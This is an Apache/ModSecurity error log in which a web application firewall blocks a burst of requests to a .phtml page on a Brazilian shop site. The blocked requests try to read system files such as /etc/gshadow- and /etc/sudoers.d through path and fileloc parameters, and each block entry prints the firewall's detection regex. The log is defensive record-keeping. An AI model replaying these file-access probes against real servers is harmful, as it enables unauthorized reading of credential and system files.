[Thu Mar 19 14:38:51.775150 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.85:47638] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0q-oXxyEfFpUF8f8o2QAAAVc"]
[Thu Mar 19 14:38:52.063513 2026] [:error] [pid 7545:tid 140411632822016] [client 57.141.18.115:47644] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rH8B84UptSoTJtYrZAAAAY0"]
[Thu Mar 19 14:38:52.234885 2026] [:error] [pid 14269:tid 140411649607424] [client 57.141.18.67:47650] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rAbLMZ6AikZjR9V5tQAAAAs"]
[Thu Mar 19 14:38:52.762413 2026] [:error] [pid 8307:tid 140411741927168] [client 57.141.18.108:47660] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rL-FhjpZGs9ba8qHGAAAAwA"]
[Thu Mar 19 14:38:53.360185 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.61:47668] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0reoXxyEfFpUF8f8o2wAAAUY"]
[Thu Mar 19 14:38:53.468478 2026] [:error] [pid 30077:tid 140411540502272] [client 57.141.18.96:47684] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rfu8EFLIOrSqIpvE8wAAAlg"]
[Thu Mar 19 14:38:54.397350 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.85:47702] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rvu8EFLIOrSqIpvE9AAAAkY"]
[Thu Mar 19 14:38:54.899372 2026] [:error] [pid 8307:tid 140411666392832] [client 57.141.18.27:47708] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0rr-FhjpZGs9ba8qHGQAAAwk"]
[Thu Mar 19 14:38:55.023420 2026] [:error] [pid 7545:tid 140411574073088] [client 57.141.18.32:47728] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0r38B84UptSoTJtYrZQAAAZQ"]
[Thu Mar 19 14:38:55.195333 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.39:47736] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0r7-FhjpZGs9ba8qHGgAAAwU"]
[Thu Mar 19 14:38:55.455492 2026] [:error] [pid 8307:tid 140411641214720] [client 57.141.18.100:47742] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0r7-FhjpZGs9ba8qHGwAAAww"]
[Thu Mar 19 14:38:57.898319 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.32:47780] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0seoXxyEfFpUF8f8o3AAAAU8"]
[Thu Mar 19 14:38:57.907370 2026] [:error] [pid 8307:tid 140411565680384] [client 57.141.18.94:47766] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0sL-FhjpZGs9ba8qHHQAAAxU"]
[Thu Mar 19 14:38:57.922239 2026] [:error] [pid 8307:tid 140411649607424] [client 57.141.18.41:47744] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0sb-FhjpZGs9ba8qHHwAAAws"]
[Thu Mar 19 14:39:06.489918 2026] [:error] [pid 7545:tid 140411674785536] [client 57.141.18.42:48074] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0un8B84UptSoTJtYrcQAAAYg"]
[Thu Mar 19 14:39:09.702672 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.51:48182] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0vda6ubjKNq_cu4ZzIQAAA1U"]
[Thu Mar 19 14:39:10.922014 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.64:48214] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0vta6ubjKNq_cu4ZzJQAAA04"]
[Thu Mar 19 14:39:12.201208 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.79:48244] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wPqxLDW4GITHUkSE-QAAAQo"]
[Thu Mar 19 14:39:12.525182 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.18:48250] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wPu8EFLIOrSqIpvE-QAAAk8"]
[Thu Mar 19 14:39:12.635320 2026] [:error] [pid 8307:tid 140411599251200] [client 57.141.18.109:48256] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wL-FhjpZGs9ba8qHJAAAAxE"]
[Thu Mar 19 14:39:14.029478 2026] [:error] [pid 8307:tid 140411716749056] [client 57.141.18.113:48296] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wr-FhjpZGs9ba8qHJwAAAwM"]
[Thu Mar 19 14:39:14.059955 2026] [:error] [pid 8307:tid 140411741927168] [client 57.141.18.114:48300] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wr-FhjpZGs9ba8qHKAAAAwA"]
[Thu Mar 19 14:39:14.123137 2026] [:error] [pid 8307:tid 140411582465792] [client 57.141.18.87:48304] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wr-FhjpZGs9ba8qHKQAAAxM"]
[Thu Mar 19 14:39:14.353775 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44654] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:39:14.948021 2026] [:error] [pid 27293:tid 140411658000128] [client 57.141.18.81:48328] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0wv-YZRR_7pZ7nDKnvAAAA8o"]
[Thu Mar 19 14:39:15.483187 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.93:48336] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0w_qxLDW4GITHUkSE-gAAAQw"]
[Thu Mar 19 14:39:16.055886 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.73:48360] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xAkwaGbbGflqUZDl5AAAAMA"]
[Thu Mar 19 14:39:17.031606 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.96:48378] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xfqxLDW4GITHUkSE-wAAARg"]
[Thu Mar 19 14:39:17.204515 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.104:48388] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xeoXxyEfFpUF8f8o4QAAAUA"]
